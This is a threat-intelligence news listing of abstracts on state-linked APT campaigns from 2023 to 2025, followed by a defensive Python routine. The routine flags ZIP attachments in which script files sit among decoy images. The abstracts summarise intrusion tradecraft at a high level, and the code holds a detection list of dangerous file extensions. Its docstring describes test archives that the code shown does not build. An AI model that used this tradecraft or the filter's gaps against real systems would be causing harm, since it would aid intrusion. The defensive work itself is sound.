Advanced Persistent Threat
June 20, 2025
APT36 Phishing Campaign Targets Indian Defense Using Credential-Stealing Malware
Abstract
APT36 is conducting a targeted phishing campaign against Indian defense personnel. The campaign uses spear-phishing emails with malicious PDF attachments that mimic official government documents to deliver credential-stealing malware.
Source: Cyfirma
May 27, 2025
Velvet Chollima APT Hackers Target Government Officials Using Weaponized PDFs
Abstract
A new cyber-espionage campaign attributed to the North Korean APT group Velvet Chollima has been identified, targeting South Korean government officials and organizations across North America, South America, Europe, and East Asia.
Source: GBHackers
May 15, 2025
Fancy Bear campaign sought emails of high-level Ukrainians and their military suppliers
Abstract
A cyber-espionage campaign by Fancy Bear (APT28), linked to Russia’s GRU, has targeted Ukrainian government and military entities, as well as international defense contractors.
Source: CyberScoop
May 14, 2025
Swan Vector APT: Targeting Taiwan & Japan with DLL Implants
Abstract
A newly identified APT campaign, dubbed “Swan Vector,” has been targeting educational and mechanical engineering sectors in East Asia, particularly Taiwan and Japan. The campaign employs spearphishing emails with malicious ZIP attachments.
Source: SeqRite
May 13, 2025
Analysis of APT37 Attack Case Disguised as a Think Tank for National Security Strategy in South Korea (Operation. ToyBox Story)
Abstract
APT37 (ScarCruft), a North Korean state-sponsored threat actor, has launched a sophisticated spear-phishing campaign dubbed “Operation: ToyBox Story,” targeting activists focused on North Korean issues.
Source: Genians
May 13, 2025
Hackers now testing ClickFix attacks against Linux targets
Abstract
A new ClickFix campaign by APT36 (Transparent Tribe), a Pakistan-linked threat actor, has expanded its targeting to include Linux systems alongside Windows and macOS. It impersonates India's Ministry of Defence to lure victims.
Source: Bleeping Computer
April 26, 2025
Operation SyncHole: Lazarus APT targets supply chains in South Korea
Abstract
The campaign has been active since at least November 2024; Lazarus Group is targeting South Korean organizations using watering hole tactics and exploiting software vulnerabilities.
Source: Security Affairs
April 23, 2025
Russian APT Gamaredon targets Ukraine with new LNK
Abstract
Security researchers have uncovered a new campaign by the Russian-affiliated APT group Gamaredon, leveraging the PteroLNK variant of the Pterodo malware family to target Ukrainian military, government, and infrastructure sectors.
Source: SC World
April 23, 2025
APT34 Hackers Use Port 8080 for Fake 404 Responses and Shared SSH Keys
Abstract
Researchers have identified dormant but potentially malicious infrastructure linked to the Iranian threat group APT34 (OilRig), known for targeting sectors such as education, government, energy, telecom, and NGOs.
Source: GBHackers
April 16, 2025
Mustang Panda: PAKLOG, CorKLOG, and SplatCloak
Abstract
Mustang Panda, a China-linked APT group, has expanded its malware arsenal with PAKLOG and CorKLOG and an EDR evasion driver named SplatCloak. The malware is delivered via RAR archives containing legitimate signed binaries and malicious DLLs.
Source: Zscaler
March 28, 2025
APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware
Abstract
A Pakistan-linked APT group has been found creating a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country.
Source: The Hacker News
March 25, 2025
Chinese Weaver Ant Hackers Spied on Telco Network for Four Years
Abstract
A China-linked advanced threat group named Weaver Ant spent more than four years in the network of a telecommunications services provider, hiding traffic and infrastructure with the help of compromised Zyxel CPE routers.
Source: Bleeping Computer
March 22, 2025
Chinese APT Aquatic Panda Conducted Global Espionage Campaign Affecting Seven Targets Using Five Malware Families
Abstract
The targeted entities include governments, Catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States.
Source: The Hacker News
March 13, 2025
SideWinder APT Targets Maritime, Nuclear, and IT Sectors Across Asia, Middle East, and Africa
Abstract
The attacks, observed in 2024, spread across Bangladesh, Cambodia, Djibouti, Egypt, the United Arab Emirates, and Vietnam. Other targets of interest include nuclear power plants and nuclear energy infrastructure in South Asia and Africa.
Source: The Hacker News
March 11, 2025
North Korean Hackers Use ZIP Files to Deploy Malicious PowerShell Scripts
Abstract
North Korean state-sponsored hackers, known as APT37 or ScarCruft, have been employing sophisticated tactics to breach systems, leveraging malicious ZIP files containing LNK files to initiate attacks.
Source: GBHackers
February 19, 2025
Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign
Abstract
The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024.
Source: The Hacker News
February 14, 2025
North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
Abstract
The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, also tracked as APT43, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima.
Source: The Hacker News
February 1, 2025
CL-STA-0048 Espionage Operation Takes Aim at High-Value Targets in South Asia
Abstract
The campaign primarily aimed to obtain the personal information of government employees and steal sensitive data from targeted organizations. These objectives bear the hallmarks of a nation-state advanced persistent threat (APT) espionage operation.
Source: Palo Alto Networks
January 22, 2025
PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack
Abstract
PlushDaemon is assessed to be a China-nexus group that has been operational since at least 2019, targeting individuals and entities in China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand.
Source: The Hacker News
January 21, 2025
Researchers Found New Android Malware Linked to DoNot Team APT Group
Abstract
The DoNot APT group has been observed misusing the OneSignal platform, which typically provides tools for sending push notifications, in-app messages, emails, and SMS. The group is leveraging OneSignal to deliver phishing links through notifications.
Source: Security Affairs
December 3, 2024
APT35 Forges Recruitment Sites, Launches Attacks on Aerospace and Semiconductor Industries in Multiple Countries
Abstract
In one of its campaigns, APT35 launched a fake recruitment site, particularly aimed at experts in drone design within the aerospace sector in Thailand. The site featured high-paying job postings, adding legitimacy to the ruse.
Source: ThreatBook
November 23, 2024
Earth Kasha Upgraded Their Arsenal With New Tactics To Attack Organizations
Abstract
Earth Kasha, a threat actor linked to APT10, has expanded its targeting scope to India, Taiwan, and Japan, leveraging spear-phishing and exploiting vulnerabilities in public-facing applications like SSL-VPN and file storage services.
Source: GBHackers
November 16, 2024
LightSpy: APT41 Deploys Advanced DeepData Framework In Targeted Southern Asia Espionage Campaign
Abstract
DeepData v3.2.1228 framework allows for extensive data theft across platforms like WhatsApp, Telegram, Signal, DingDing, and Feishu. It consists of 12 specialized plugins for extracting messaging data, emails, credentials, and system information.
Source: BlackBerry
November 9, 2024
North Korean APT BlueNoroff Targets Macs with Fake Crypto News and Novel Persistence
Abstract
SentinelLabs found a new type of malware being used by North Korean hackers to target businesses that deal with cryptocurrency. This malware is similar to attacks previously linked to BlueNoroff.
Source: SentinelOne
November 5, 2024
APT36 Deploys ElizaRAT and ApoloStealer in Attacks on Indian Targets
Abstract
Over the past year, APT36 has been observed using three different versions of ElizaRAT in separate campaigns targeting Indian entities, with the latest version using Google Drive for command-and-control communications.
Source: Dark Reading
October 29, 2024
Evasive Panda Using New CloudScout Toolset to Steal Data From Google Drive, Gmail, and Outlook
Abstract
A toolset called CloudScout developed by the APT group Evasive Panda is targeting Taiwanese institutions to extract cloud-based data. The attacks, discovered by ESET, exploit session cookies stolen by MgBot plugins to access cloud services.
Source: WeLiveSecurity
October 28, 2024
Russia’s APT29 Mimics AWS to Steal Windows Credentials
Abstract
A recent campaign by APT29 involved sending emails from fake Amazon Web Services (AWS) domains to trick recipients into opening malicious attachments containing configuration files for Remote Desktop.
Source: Cyware
October 22, 2024
New China-Nexus APT Group IcePeony Targeting Asian Nations
Abstract
IcePeony employs sophisticated attack methods such as SQL injection, webshells, and a unique malware known as "IceCache" to achieve its goals. The group's primary objective seems to be credential theft.
Source: Cyware
September 20, 2024
UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks
Abstract
UNC1860 has been observed using victim networks as staging areas for additional operations, targeting entities in Saudi Arabia and Qatar. They overlap with APT34, assisting in lateral movement within compromised organizations.
September 10, 2024
Chinese APT Group Abuses Visual Studio Code to Target Government in Asia
Abstract
Chinese APT group Stately Taurus exploited Visual Studio Code to target government entities in Southeast Asia for cyberespionage. They utilized the software's reverse shell feature to infiltrate networks, a technique first detected in 2023.
Source: Palo Alto Networks
September 3, 2024
North Korea-linked APT Citrine Sleet Exploits Chrome Zero-Day to Deliver FudModule Rootkit
Abstract
A North Korean APT used a Google Chrome zero-day flaw, CVE-2024-7971, to deploy the FudModule rootkit. Microsoft researchers linked these attacks to Citrine Sleet (AppleJeus, Labyrinth Chollima, UNC4736, or Hidden Cobra) with medium confidence.
Source: Security Affairs
August 31, 2024
Operation DevilTiger: APT-Q-12’s Shadowy Tactics and Zero-Day Exploits Unveiled
Abstract
The QiAnXin Threat Intelligence Center has revealed the details of "Operation DevilTiger," a cyber espionage campaign carried out by the elusive APT-Q-12 group, also known as "Pseudo Hunter."
Source: Security Online
August 24, 2024
China-linked APT Velvet Ant Exploited Zero-Day to Compromise Cisco Nexus Switches
Abstract
The China-linked APT group Velvet Ant exploited a zero-day vulnerability in Cisco switches, CVE-2024-20399, to take control of network devices. The flaw in Cisco NX-OS Software's CLI enabled attackers with Admin credentials to run arbitrary commands.
Source: Security Affairs
July 20, 2024
APT41 Has Arisen From the DUST
Abstract
APT41, a China-based hacking group, has targeted organizations in shipping, logistics, media, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. since 2023.
May 15, 2024
SideCopy APT Campaign Found Targeting Indian Universities
Abstract
Active since May 2023, the SideCopy APT campaign targets university students through sophisticated infection chains involving malicious LNK files, HTAs, and loader DLLs disguised as legitimate documents.
Source: The Cyber Express
May 11, 2024
‘The Mask’ Espionage Group Resurfaces After 10-Year Hiatus
Abstract
An advanced persistent threat (APT) group that has been missing in action for more than a decade has suddenly resurfaced in a cyber-espionage campaign targeting organizations in Latin America and Central Africa.
Source: Dark Reading
May 6, 2024
NiceCurl and TameCat Custom Backdoors Leveraged by Damselfly APT
Abstract
The Damselfly Advanced Persistent Threat (APT) group, also known as APT42, has been actively using custom backdoor variants, NiceCurl and TameCat, to infiltrate Windows machines.
Source: Broadcom
April 23, 2024
Russian APT28 Group in New “GooseEgg” Hacking Campaign
Abstract
A notorious Russian APT group has been stealing credentials for years by exploiting a Windows Print Spooler bug and using a novel post-compromise tool known as “GooseEgg,” Microsoft has revealed.
Source: Infosecurity Magazine
April 10, 2024
Vedalia APT Group Exploits Oversized LNK Files in Malware Campaign
Abstract
The Vedalia APT group has ingeniously utilized LNK files with double extensions, effectively masking the malicious .lnk extension. This tactic deceives users into believing the files are harmless, increasing the likelihood of execution.
Source: Broadcom
March 26, 2024
US Indicts Accused APT31 Chinese Hackers for Hire
Abstract
U.S. federal prosecutors indicted seven Chinese nationals they accuse of hacking for a Beijing economic and intelligence espionage group whose operations reacted to geopolitical trends.
Source: Bank Info Security
March 20, 2024
Russia-Linked APT28 Targets Victims Worldwide for Intelligence Gathering
Abstract
Fancy Bear has utilized at least 11 unique lures in campaigns targeting organizations in Argentina, Ukraine, Georgia, Belarus, Kazakhstan, Poland, Armenia, Azerbaijan, and the United States.
Source: Dark Reading
March 8, 2024
China-Linked Evasive Panda APT Leverages Monlam Festival to Target Tibetans
Abstract
The attacks involved compromising websites, such as the Kagyu International Monlam Trust's website, to specifically target users in India, Taiwan, Hong Kong, Australia, and the U.S.
Source: Cyware
February 27, 2024
Russian SVR-Linked APT29 Threat Actors Adapt Their Tactics for Initial Cloud Access
Abstract
The Russian Foreign Intelligence Service (SVR) cyber actors, also known as APT29 or Cozy Bear, have shifted their tactics to target cloud environments as organizations increasingly move to cloud-based infrastructure.
Source: Cyware
February 8, 2024
Kimsuky APT Disguises as a Korean Company to Distribute Troll Stealer
Abstract
Troll Stealer's similarities to known malware families linked to Kimsuky, such as AppleSeed and AlphaSeed, raise concerns about the group's offensive cyber operations and its targeting of South Korean entities.
Source: Cyware
February 02, 2024
Russian APT28 Hackers Targeting High-Value Orgs with NTLM Relay Attacks
Abstract
Russian state-sponsored actors have staged NT LAN Manager (NTLM) v2 hash relay attacks through various methods from April 2022 to November 2023, targeting high-value targets worldwide. The attacks, attributed to an "aggressive" hacking crew called APT28, have set their eyes on organizations dealing with foreign affairs, energy, defense, and transportation, as well as those involved with labor, social welfare, finance, parenthood, and local city councils. Cybersecurity firm Trend Micro assessed these intrusions as a "cost-efficient method of automating attempts to brute-force its way into the networks" of its targets, noting the adversary may have compromised thousands of email accounts over time. APT28 is also tracked by the broader cybersecurity community under the names Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. The group, believed to be
Source: The Hacker News
January 31, 2024
Pawn Storm Uses Brute Force and Stealth Against High-Value Targets
Abstract
Pawn Storm, aka APT28 and Forest Blizzard, has been employing anonymization layers, such as VPN services and compromised EdgeOS routers, to hide its tracks and carry out sophisticated attacks.
Source: Cyware
January 26, 2024
Microsoft Warns of Widening APT29 Espionage Attacks Targeting Global Orgs
Abstract
Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a cyber attack on its systems in late November 2023 have been targeting other organizations and that it's currently beginning to notify them. The development comes a day after Hewlett Packard Enterprise (HPE) revealed that it had been the victim of an attack perpetrated by a hacking crew tracked as APT29, which is also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. "This threat actor is known to primarily target governments, diplomatic entities, non-governmental organizations (NGOs) and IT service providers, primarily in the U.S. and Europe," the Microsoft Threat Intelligence team said in a new advisory. The primary goal of these espionage missions is to gather sensitive information that is of strategic interest to Russia by maintaining footholds for extended periods of time without attracting any attention. The latest disc
Source: The Hacker News
January 20, 2024
China-linked APT UNC3886 Exploits VMware Zero-Day Since 2021
Abstract
Mandiant researchers observed UNC3886 exploiting a VMware ESXi zero-day vulnerability in June 2023, using novel malware persistence techniques to achieve administrative access within VMware ESXi Hypervisors.
Source: Cyware
January 6, 2024
Iranian APT Used No-Justice Wiper in Recent Albanian Attacks
Abstract
The cybersecurity firm ClearSky identified the tools used, including the No-Justice wiper and a PowerShell code. The malware had a valid digital signature, making it appear legitimate.
Source: Cyware
December 20, 2023
Iranian APT Group Targets Telecom Organizations in North and East Africa
Abstract
Seedworm (aka Muddywater) continues to use a combination of living-off-the-land and publicly available tools, but has also developed its own custom tools, such as a custom build of Venom Proxy and a custom keylogger.
Source: Cyware
December 14, 2023
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
Abstract
The Iranian state-sponsored threat actor known as OilRig deployed three different downloader malware throughout 2022 to maintain persistent access to victim organizations located in Israel. The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader dubbed SampleCheck5000 (or SC5k). "These lightweight downloaders [...] are notable for using one of several legitimate cloud service APIs for [command-and-control] communication and data exfiltration: the Microsoft Graph OneDrive or Outlook APIs, and the Microsoft Office Exchange Web Services (EWS) API," security researchers Zuzana Hromcová and Adam Burgher said in a report shared with The Hacker News. By using well-known cloud service providers for command-and-control communication, the goal is to blend with authentic network traffic and cover up the group's attack infrastructure
Source: The Hacker News
December 14, 2023
Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks
Abstract
Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain attack targeting SolarWinds and its customers in 2020. "The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments," cybersecurity agencies from Poland, the U.K., and the U.S. said. The vulnerability in question is CVE-2023-42793 (CVSS score: 9.8), a critical security flaw that could be weaponized by unauthenticated attackers to achieve remote code execution on affec
Source: The Hacker News
December 14, 2023
China-Linked APT Volt Typhoon Linked to KV-Botnet Attacks
Abstract
Volt Typhoon utilizes living-off-the-land techniques and hands-on-keyboard activity to evade detection, routing malicious traffic through compromised SOHO network devices and relying on customized versions of open-source tools for communication.
Source: Cyware
December 12, 2023
Russian APT28 Hackers Targeting 13 Nations in Ongoing Cyber Espionage Campaign
Abstract
The Russian nation-state threat actor known as APT28 has been observed making use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace. IBM X-Force is tracking the adversary under the name ITG05, which is also known as BlueDelta, Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422. "The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers," security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said. "ITG05's infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign." Targets of the campaign include Hungary, Türkiye, Australia, Poland, Belgium, Ukraine, Germany, Azerbaijan, Saudi Arabia, Kazakhstan, Italy, Latvia, and Romania
Source: The Hacker News
December 11, 2023
Researchers Unmask Sandman APT’s Hidden Link to China-Based KEYPLUG Backdoor
Abstract
Tactical and targeting overlaps have been discovered between the enigmatic advanced persistent threat (APT) called Sandman and a China-based threat cluster that's known to use a backdoor known as KEYPLUG. The assessment comes jointly from SentinelOne, PwC, and the Microsoft Threat Intelligence team based on the fact that the adversary's Lua-based malware LuaDream and KEYPLUG have been determined to cohabit in the same victim networks. Microsoft and PwC are tracking the activity under the names Storm-0866 and Red Dev 40, respectively. "Sandman and Storm-0866/Red Dev 40 share infrastructure control and management practices, including hosting provider selections, and domain naming conventions," the companies said in a report shared with The Hacker News. "The implementation of LuaDream and KEYPLUG reveals indicators of shared development practices and overlaps in functionalities and design, suggesting shared functional requirements by their operators."
Source: The Hacker News
December 7, 2023
TA422’s Dedicated Exploitation Loop—the Same Week After Week
Abstract
Russian APT group TA422 has been actively exploiting patched vulnerabilities to target government, aerospace, education, finance, manufacturing, and technology sectors in Europe and North America.
Source: Cyware
December 05, 2023
Microsoft Warns of Kremlin-Backed APT28 Exploiting Critical Outlook Vulnerability
Abstract
Microsoft on Monday said it detected Kremlin-backed nation-state activity exploiting a now-patched critical security flaw in its Outlook email service to gain unauthorized access to victims' accounts within Exchange servers. The tech giant attributed the intrusions to a threat actor it called Forest Blizzard (formerly Strontium), which is also widely tracked under the monikers APT28, BlueDelta, Fancy Bear, FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422. The security vulnerability in question is CVE-2023-23397 (CVSS score: 9.8), a critical privilege escalation bug that could allow an adversary to access a user's Net-NTLMv2 hash that could then be used to conduct a relay attack against another service to authenticate as the user. It was patched by Microsoft in March 2023. The goal, according to the Polish Cyber Command (DKWOC), is to obtain unauthorized access to mailboxes belonging to public and private entities in the country. "In the next stage of malici
Source: The Hacker News
November 16, 2023
Experts Uncover DarkCasino: New Emerging APT Threat Exploiting WinRAR Flaw
Abstract
A hacking group that leveraged a recently disclosed security flaw in the WinRAR software as a zero-day has now been categorized as an entirely new advanced persistent threat (APT). Cybersecurity company NSFOCUS has described DarkCasino as an "economically motivated" actor that first came to light in 2021. "DarkCasino is an APT threat actor with strong technical and learning ability, who is good at integrating various popular APT attack technologies into its attack process," the company said in an analysis. "Attacks launched by the APT group DarkCasino are very frequent, demonstrating a strong desire to steal online property." DarkCasino was most recently linked to the zero-day exploitation of CVE-2023-38831 (CVSS score: 7.8), a security flaw that can be weaponized to launch malicious payloads. In August 2023, Group-IB disclosed real-world attacks weaponizing the vulnerability and aimed at online trading forums at least since April 2023 to deli
Source: The Hacker News
November 13, 2023
North Korea-Linked APT Sapphire Sleet Targets IT Job Seekers
Abstract
They have created fake skills assessment portals to trick recruiters into registering for an account. Previously, they used platforms like LinkedIn and employed lures related to skills assessment.
Source: Cyware
November 11, 2023
New APT Group DarkCasino and the Global Surge in WinRAR 0-Day Exploits
Abstract
DarkCasino exploited a WinRAR 0-day vulnerability (CVE-2023-38831) to launch phishing attacks against forum users, posing a significant threat due to the large installed base and difficulty in identifying and defending against these attacks.
Source: Cyware
November 10, 2023
Russian Hackers Sandworm Cause Power Outage in Ukraine Amidst Missile Strikes
Abstract
The notorious Russian hackers known as Sandworm targeted an electrical substation in Ukraine last year, causing a brief power outage in October 2022. The findings come from Google's Mandiant, which described the hack as a "multi-event cyber attack" leveraging a novel technique for impacting industrial control systems (ICS). "The actor first used OT-level living-off-the-land (LotL) techniques to likely trip the victim's substation circuit breakers, causing an unplanned power outage that coincided with mass missile strikes on critical infrastructure across Ukraine," the company said. "Sandworm later conducted a second disruptive event by deploying a new variant of CaddyWiper in the victim's IT environment." The threat intelligence firm did not reveal the location of the targeted energy facility, the duration of the blackout, and the number of people who were impacted by the incident. The development marks Sandworm's continuous
Source: The Hacker News
November 9, 2023
Russian Sandworm APT Group Caused Power Outage in October 2022
Abstract
The attack was not driven by military necessity but rather aimed to increase the psychological toll of the war, showcasing Russia's focus on disrupting and degrading military readiness through cyber means.
Source: Cyware
November 8, 2023
Chinese APTs Targeting Cambodian Government
Abstract
By monitoring telemetry associated with two prominent Chinese APT groups, researchers observed network connections predominantly originating from Cambodia, including inbound connections originating from at least 24 Cambodian government organizations.
Source: Cyware
November 07, 2023
N. Korea’s BlueNoroff Blamed for Hacking macOS Machines with ObjCShellz Malware
Abstract
The North Korea-linked nation-state group called BlueNoroff has been attributed to a previously undocumented macOS malware strain dubbed ObjCShellz. Jamf Threat Labs, which disclosed details of the malware, said it's used as part of the RustBucket malware campaign, which came to light earlier this year. "Based on previous attacks performed by BlueNoroff, we suspect that this malware was a late stage within a multi-stage malware delivered via social engineering," security researcher Ferdous Saljooki said in a report shared with The Hacker News. BlueNoroff, also tracked under the names APT38, Nickel Gladstone, Sapphire Sleet, Stardust Chollima, and TA444, is a subordinate element of the infamous Lazarus Group that specializes in financial crime, targeting banks and the crypto sector as a way to evade sanctions and generate illicit profits for the regime. The development arrives days after Elastic Security Labs disclosed the Lazarus Group's use of a new ma
Source: The Hacker News
November 6, 2023
SideCopy APT’s Multi-Platform Onslaught Targets Indian Government and Defense Entities
Abstract
SideCopy is employing phishing tactics and using compromised domains with reused IP addresses to distribute malicious files and deploy malware, including a Linux variant of the Ares RAT, indicating a multi-platform approach in their attacks.
Source: Cyware
November 6, 2023
Iranian APT Targets Israeli Education, Tech Sectors With New Data Wipers
Abstract
An Iranian APT group known as Agrius has been targeting higher education and technology organizations in Israel with destructive attacks and wipers, including MultiLayer, PartialWasher, and BFG Agonizer, since January 2023.
Source: Cyware
October 19, 2023
New Campaign by Iranian APT Group Targets Middle Eastern Government Full Text
Abstract
The attackers made use of legitimate tools like Plink to configure port-forwarding rules, enabling remote access via the Remote Desktop Protocol (RDP), and modified Windows firewall rules to facilitate their activities.Cyware
October 13, 2023
Researchers Unveil ToddyCat’s New Set of Tools for Data Exfiltration Full Text
Abstract
The advanced persistent threat (APT) actor known as ToddyCat has been linked to a new set of malicious tools that are designed for data exfiltration, offering a deeper insight into the hacking crew's tactics and capabilities. The findings come from Kaspersky, which first shed light on the adversary last year, linking it to attacks against high-profile entities in Europe and Asia for nearly three years. While the group's arsenal prominently features Ninja Trojan and a backdoor called Samurai, further investigation has uncovered a whole new set of malicious software developed and maintained by the actor to achieve persistence, conduct file operations, and load additional payloads at runtime. This comprises a collection of loaders that comes with capabilities to launch the Ninja Trojan as a second stage, a tool called LoFiSe to find and collect files of interest, a DropBox uploader to save stolen data to Dropbox, and Pcexter to exfiltrate archive files to Microsoft OneDrThe Hacker News
October 11, 2023
A New Threat on the Horizon: The Grayling APT Group Full Text
Abstract
Symantec found a previously unidentified threat actor named Grayling conducting advanced persistent attacks targeting organizations in Taiwan, the Pacific Islands, Vietnam, and the U.S., with a focus on intelligence gathering. Grayling's modus operandi seems to revolve around exploiting public infr ... Read MoreCyware
October 10, 2023
Previously Unseen Grayling APT Targets Multiple Organizations in Taiwan Full Text
Abstract
Grayling employs a combination of custom malware and publicly available tools like Havoc, Cobalt Strike, and NetSpy to carry out its attacks, using DLL sideloading techniques and exploiting vulnerabilities like CVE-2019-0803.Cyware
October 10, 2023
Researchers Uncover Grayling APT’s Ongoing Attack Campaign Across Industries Full Text
Abstract
A previously undocumented threat actor of unknown provenance has been linked to a number of attacks targeting organizations in the manufacturing, IT, and biomedical sectors in Taiwan. The Symantec Threat Hunter Team, part of Broadcom, attributed the attacks to an advanced persistent threat (APT) it tracks under the name Grayling . Evidence shows that the campaign began in February 2023 and continued until at least May 2023. Also likely targeted as part of the activity is a government agency located in the Pacific Islands, as well as entities in Vietnam and the U.S. "This activity stood out due to the use by Grayling of a distinctive DLL side-loading technique that uses a custom decryptor to deploy payloads," the company said in a report shared with The Hacker News. "The motivation driving this activity appears to be intelligence gathering." The initial foothold to victim environments is said to have been achieved by exploiting public-facing infrastructure,The Hacker News
September 30, 2023
Iranian APT Group OilRig Using New Menorah Malware for Covert Operations
Abstract
Sophisticated cyber actors backed by Iran known as OilRig have been linked to a spear-phishing campaign that infects victims with a new strain of malware called Menorah. "The malware was designed for cyberespionage, capable of identifying the machine, reading and uploading files from the machine, and downloading another file or malware," Trend Micro researchers Mohamed Fahmy and Mahmoud Zohdy said in a Friday report. The victimology of the attacks is not immediately known, although the use of decoys indicates at least one of the targets is an organization located in Saudi Arabia. Also tracked under the names APT34, Cobalt Gypsy, Hazel Sandstorm, and Helix Kitten, OilRig is an Iranian advanced persistent threat (APT) group that specializes in covert intelligence gathering operations to infiltrate and maintain access within targeted networks. The revelation builds on recent findings from NSFOCUS, which uncovered an OilRig phishing attack resulting in the deploymen ... The Hacker News
September 26, 2023
Sandman APT Brings LuaDream, Targets Telcos in Middle East
Abstract
SentinelOne found the Sandman APT group targeting telecommunications companies in the Middle East, Western Europe, and South Asia using a novel backdoor called LuaDream. The researchers noted that the campaign began in August and demonstrates advanced tactics. With this, the Middle East is onc ... Cyware
September 22, 2023
Sandman APT Infiltrates Telecommunications Companies Using LuaDream Backdoor
Abstract
The activities of Sandman suggest espionage motivations, with a focus on telecommunications providers and a potential connection to a private contractor or mercenary group.Cyware
September 19, 2023
Transparent Tribe Uses Fake YouTube Android Apps to Spread CapraRAT Malware
Abstract
The suspected Pakistan-linked threat actor known as Transparent Tribe is using malicious Android apps mimicking YouTube to distribute the CapraRAT mobile remote access trojan (RAT), demonstrating the continued evolution of the activity. "CapraRAT is a highly invasive tool that gives the attacker control over much of the data on the Android devices that it infects," SentinelOne security researcher Alex Delamotte said in a Monday analysis. Transparent Tribe, also known as APT36, is known to target Indian entities for intelligence-gathering purposes, relying on an arsenal of tools capable of infiltrating Windows, Linux, and Android systems. A crucial component of its toolset is CapraRAT, which has been propagated in the form of trojanized secure messaging and calling apps branded as MeetsApp and MeetUp. These weaponized apps are distributed using social engineering lures. The latest set of Android package (APK) files discovered by SentinelOne are engineered to mas ... The Hacker News
September 06, 2023
Ukraine’s CERT Thwarts APT28’s Cyberattack on Critical Energy Infrastructure
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday said it thwarted a cyber attack against an unnamed critical energy infrastructure facility in the country. The intrusion, per the agency, started with a phishing email containing a link to a malicious ZIP archive that activates the infection chain. "Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file 'weblinks.cmd' to the victim's computer," CERT-UA said, attributing it to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE). "When a CMD file is run, several decoy web pages will be opened, .bat and .vbs files will be created, and a VBS file will be launched, which in turn will execute the BAT file." The next phase of the attack involves running the "whoami" command on the compromised host and exfiltrating the information, alongside downloading the TOR hidden service to route malicious traffic. Persistence is achieve ... The Hacker News
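The lure described above is an archive of image decoys with one executable script hiding among them. The triage routine below is an added example (not CERT-UA's or The Hacker News' code) that a mail gateway or sandbox pre-filter could apply: it lists every entry, flags script or executable extensions bundled with decoy documents, and checks the leading bytes of each "image" so a renamed PE file does not pass as a JPEG. The archives are constructed in memory to mimic the reported layout (three JPG files plus weblinks.cmd); the image names, the batch file's contents and the decoy URL are assumptions.

```python
"""Triage a ZIP attachment for the "decoys plus one script" layout.

Added example, not CERT-UA's or The Hacker News' code. The archives are
constructed in memory to mimic the layout reported above (three JPG decoys
next to weblinks.cmd); image file names, the batch file's contents and the
decoy URL are assumptions.
"""
import io
import zipfile

# Entries that execute on double-click and have no business beside "photos".
SCRIPT_EXTENSIONS = {".cmd", ".bat", ".vbs", ".vbe", ".js", ".jse", ".wsf",
                     ".ps1", ".hta", ".lnk", ".exe", ".scr", ".dll"}
DECOY_EXTENSIONS = {".jpg", ".jpeg", ".png", ".pdf", ".docx", ".xlsx"}
JPEG_MAGIC = b"\xff\xd8\xff"   # every JPEG starts with SOI followed by a marker byte
MZ_MAGIC = b"MZ"               # PE/DOS executable header


def _ext(name: str) -> str:
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def triage_zip(data: bytes) -> dict:
    """Classify every entry and return a verdict dict.

    suspicious is True when scripts are bundled with decoy documents, or when
    an entry's leading bytes contradict its extension (renamed executable).
    """
    scripts, decoys, findings = [], [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ext = _ext(info.filename)
            with zf.open(info) as fh:
                head = fh.read(4)
            if ext in SCRIPT_EXTENSIONS:
                scripts.append(info.filename)
            elif ext in DECOY_EXTENSIONS:
                decoys.append(info.filename)
                if ext in {".jpg", ".jpeg"} and not head.startswith(JPEG_MAGIC):
                    findings.append(f"{info.filename}: named as JPEG but content is not a JPEG")
                if head.startswith(MZ_MAGIC):
                    findings.append(f"{info.filename}: PE executable disguised as {ext}")
    if scripts and decoys:
        findings.append(f"script(s) {scripts} bundled with decoy files {decoys}")
    return {"suspicious": bool(findings), "scripts": scripts,
            "decoys": decoys, "findings": findings}


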